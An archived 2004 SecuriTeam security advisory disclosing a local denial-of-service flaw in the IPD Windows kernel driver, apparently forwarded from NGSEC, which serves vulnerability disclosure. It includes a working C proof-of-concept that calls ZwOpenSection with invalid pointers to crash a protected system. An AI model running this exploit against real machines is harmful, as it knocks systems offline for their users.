[NT] IPD Local System Denial of Service

From: SecuriTeam (support_at_securiteam.com)
Date: 08/18/04

  • Next message: SecuriTeam: "[UNIX] mysqlhotcopy Insecure Temporary File (copy_index)" 
    To: list@securiteam.com
Date: 18 Aug 2004 14:28:40 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      IPD Local System Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

    The <http://www.pedestalsoftware.com/> IPD (Integrity protection driver)
    is "an Open Source device driver designed to prohibit the installation of
    new services and drivers and to protect existing driver from tampering. It
    installs on Windows NT and Windows 2000 computers".

    In its security approach IPD hooks some kernel mode functions and filters
    them allowing or not their original purposes based on IPD's security
    policy.

    IPD suffers from an invalidated pointer referencing in some of this kernel
    hooks.

    DETAILS

    Vulnerable Systems:
     * IPD versions up to 1.4

    Technical description:
    The IPD (Integrity protection driver) is an Open Source device driver
    designed to prohibit the installation of new services and drivers and to
    protect existing driver from tampering. It installs on Windows NT and
    Windows 2000 computers.

    In its security approach IPD hooks some kernel mode functions and filters
    them allowing or not their original purposes based on IPD's security
    policy.

    IPD suffers from some invalidated pointer referencing in some of this
    kernel hooks. In example IPD hooks ZwOpenSection declared as follows:

            NTSTATUS ZwOpenSection(HANDLE Handle, DWORD mask, DWORD oa);

    The problem exists because IPD does not properly check whether "oa"
    pointer is valid or not. Any local and unauthorized user can crash the.

    Recommendations:
    Since the vendor has discontinued the development and support of IPD,
    NGSEC recomends to uninstall IPD.

    Exploit:
    /*
     * ipd-dos.c
     *
     * Copyright (c) 2002-2004 By Next Generation Security S.L.
     * All rights reserved
     *
     * Compiles with: cl ipd-dos.c
     *
     * Madrid, August 2004
     */

    #include <windows.h>

    #define MY_NULL 0x01
    typedef DWORD (* zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa);

    int main(int argc, char *argv[]) {
    HINSTANCE dll;
    zwopensection_TYPE my_ZwOpenSection;

      if ((dll=LoadLibrary("ntdll.dll"))!=NULL) {

         if
    ((my_ZwOpenSection=(zwopensection_TYPE)GetProcAddress(dll,"ZwOpenSection"))!=NULL) {

             my_ZwOpenSection(MY_NULL,MY_NULL,MY_NULL);

         }
      }

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:fjserna@ngsec.com> Ferm n J.
    Serna.
    The original article can be found at:
    <http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt>
    http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] mysqlhotcopy Insecure Temporary File (copy_index)"

    Relevant Pages